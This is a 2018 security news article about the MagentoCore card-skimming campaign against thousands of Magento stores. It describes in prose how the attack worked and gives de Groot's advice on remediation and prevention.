“MagentoCore” Malware Infects Thousands of E-Commerce Websites Worldwide

MagentoCore” Malware Infects Thousands of E Commerce Websites Worldwide

It has been revealed that thousands of e-commerce stores across the globe have been running, though unwittingly, a dangerous malware that skims payment details. Reports suggest that this malware, which has been stealing payment details of thousands of users worldwide, has been infecting as many as 50 new stores each day.

Willem de Groot, who is a prominent Dutch security blogger and researcher, had uncovered the infected; he has named the malware ‘MagentoCore’ as it infects the popular e-commerce software Magento.

In his blog, Willem de Groot has written a post on the malware; de Groot says, “Online skimming – your identity and card are stolen while you shop – has been around for a few years, but no campaign has been so prolific as the MagentoCore.net skimmer. In the last 6 months, the group has turned 7339 individual stores into zombie money machines, to the benefit of their illustrious masters.”

He adds, “The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months.”

Based on the daily scans that he has done, de Groot has revealed that new brands were being hijacked at a pace of 50 to 60 stores per day; this is the data he has got over the course of the two weeks immediately preceding the post (dated August 31, 2018) that he has made on his blog. He also points out that though the hackers have targeted multi-million dollar publicly traded companies, it’s the customers who are the real victims since it’s their card details and identities that get stolen and maybe misused as well.

The MagentoCore malware infects an e-commerce website mostly by applying brute-force techniques, like for example automatically trying lots of passwords, sometimes for months. Once this works out, an embedded piece of Javascript is added to the website’s HTML template, following which all keystrokes from the customers on the website would be recorded. The data thus recorded would be sent, in real-time, to the hacker’s main server, which, according to de Groot, is “registered in Moscow”. Thus all personal details about customers- usernames, passwords, credit card data etc- are stolen.

Willem de Groot adds, “The malware includes a recovery mechanism as well. In case of the Magento software, it adds a backdoor to cron.php. That will periodically download malicious code, and, after running, delete itself, so no traces are left.”

How to deal with an infection…

Any e-commerce store that has detected the presence of a skimmer should focus on doing the following things, as per Willem de Groot:

  • Finding out how the hackers had gained their entry into the system. It needs to be found out if any of the staff computers is infected. This can be done by analyzing back-end logs and correlating with staff IPs and their working hours. Suspicious activities, if any, could help identify the system that has been infected or the session that the hacker has hijacked.
  • Finding the backdoors and the unauthorized changed that are there is the store’s codebase.
  • Closing or blocking all the means that the hackers have used for unauthorized access.
  • Removing the skimmer, backdoors and other code and then reverting to a certified safe copy of the codebase, if that’s possible. (Willem de Groot says, “Malware is often hidden in default HTML header/footers, but also in minimized, static Javascript files, hidden in deep in the codebase. You should check all HTML/JS assets that are loaded during the checkout process.”)
  • Implementing strong security procedures to prevent future infections.

E-commerce companies that don’t have much experience with forensic analysis can also hire the services of a professional.

Strong passwords, regular patching help prevent infection

Having strong passwords, effective password management and regular patching would definitely go a great way in preventing infection. This applies not just to the ‘MagentoCore’ malware, but to all malware infections in general.

Passwords need to be strong, with a mix of capital and small letters, numbers and non-alphanumerical characters. The passwords need to be changed regularly as well.

E-commerce businesses must have a stringent patching schedule, with patching being done at least once a week. The patching frequency needs to increase if any business is operating active online environments, like e-commerce stores.

It’s always to be remembered that cybercriminals are on the lookout for unpatched websites that may contain security vulnerabilities.

Useful Tools

Malicious Website Checker


    Leave a Comment


    Welcome! Login in to your account

    Remember me Lost your password?

    Don't have account. Register

    Lost Password